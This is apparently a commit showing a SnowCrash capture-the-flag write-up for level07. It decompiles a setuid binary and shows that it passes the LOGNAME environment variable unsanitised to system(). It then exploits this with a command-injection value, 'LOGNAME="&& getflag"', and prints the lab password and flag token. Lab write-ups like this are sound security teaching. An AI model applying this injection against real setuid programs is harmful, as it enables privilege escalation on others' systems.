feat(maiboyer/levels): adding maiboyer levels (without all issues)
This commit is contained in:
Raphael
parent
e674ffcf4a
commit
db7f1343c5
48 changed files with 1864 additions and 0 deletions
99
snowcrash/level07/README.md
Normal file
99
snowcrash/level07/README.md
Normal file
|
|
@ -0,0 +1,99 @@
|
|||
# Level 07
|
||||
|
||||
## how to login
|
||||
|
||||
username: level07
|
||||
|
||||
password: wiok45aaoguiboiki2tuin6ub
|
||||
|
||||
## Goal
|
||||
|
||||
run `getflag` as user `flag07`
|
||||
|
||||
## Actually doing something
|
||||
|
||||
```bash
|
||||
level07@SnowCrash:~$ ll
|
||||
total 24
|
||||
dr-x------ 1 level07 level07 120 Mar 5 2016 ./
|
||||
d--x--x--x 1 root users 340 Aug 30 2015 ../
|
||||
-r-x------ 1 level07 level07 220 Apr 3 2012 .bash_logout*
|
||||
-r-x------ 1 level07 level07 3518 Aug 30 2015 .bashrc*
|
||||
-rwsr-sr-x 1 flag07 level07 8805 Mar 5 2016 level07*
|
||||
-r-x------ 1 level07 level07 675 Apr 3 2012 .profile*
|
||||
```
|
||||
|
||||
seems like reverse engineering to me
|
||||
|
||||
```bash
|
||||
level07@SnowCrash:~$ ./level07
|
||||
level07
|
||||
```
|
||||
|
||||
seems to be fun at parties indeed
|
||||
|
||||
lets crack open ghidra
|
||||
|
||||
|
||||
```c
|
||||
int main(int argc,char **argv,char **envp)
|
||||
|
||||
{
|
||||
char *pcVar1;
|
||||
int iVar2;
|
||||
char *buffer;
|
||||
gid_t gid;
|
||||
uid_t uid;
|
||||
char *local_1c;
|
||||
__gid_t local_18;
|
||||
__uid_t local_14;
|
||||
|
||||
local_18 = getegid();
|
||||
local_14 = geteuid();
|
||||
setresgid(local_18,local_18,local_18);
|
||||
setresuid(local_14,local_14,local_14);
|
||||
local_1c = (char *)0x0;
|
||||
pcVar1 = getenv("LOGNAME");
|
||||
asprintf(&local_1c,"/bin/echo %s ",pcVar1);
|
||||
iVar2 = system(local_1c);
|
||||
return iVar2;
|
||||
}
|
||||
```
|
||||
we have the classic setuid dance at the begining of the function, then a call to `getenv`+`asprintf`+`system`
|
||||
|
||||
I see a `system` so I know we are on track !
|
||||
|
||||
but lets go in order and clean up the code a bit
|
||||
|
||||
```c
|
||||
int main(int argc,char **argv,char **envp)
|
||||
{
|
||||
char *env;
|
||||
int ret;
|
||||
char *str;
|
||||
|
||||
str = NULL;
|
||||
env = getenv("LOGNAME");
|
||||
asprintf(&str,"/bin/echo %s ",env);
|
||||
ret = system(str);
|
||||
return ret;
|
||||
}
|
||||
```
|
||||
|
||||
already way better
|
||||
|
||||
It looks like it does something like this:
|
||||
|
||||
- Get the Varaible `LOGNAME`
|
||||
- Create a string that looks like `/bin/echo $LOGNAME` using asprintf
|
||||
asprintf is a way to create an allocated string with the format a regular printf would output
|
||||
- call system to execute the created string
|
||||
|
||||
To me this reeks of simple `&& getflag`, lets try it out !
|
||||
|
||||
```bash
|
||||
level07@SnowCrash:~$ LOGNAME="&& getflag" ./level07
|
||||
|
||||
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
|
||||
```
|
||||
|
||||
Loading…
Add table
Add a link
Reference in a new issue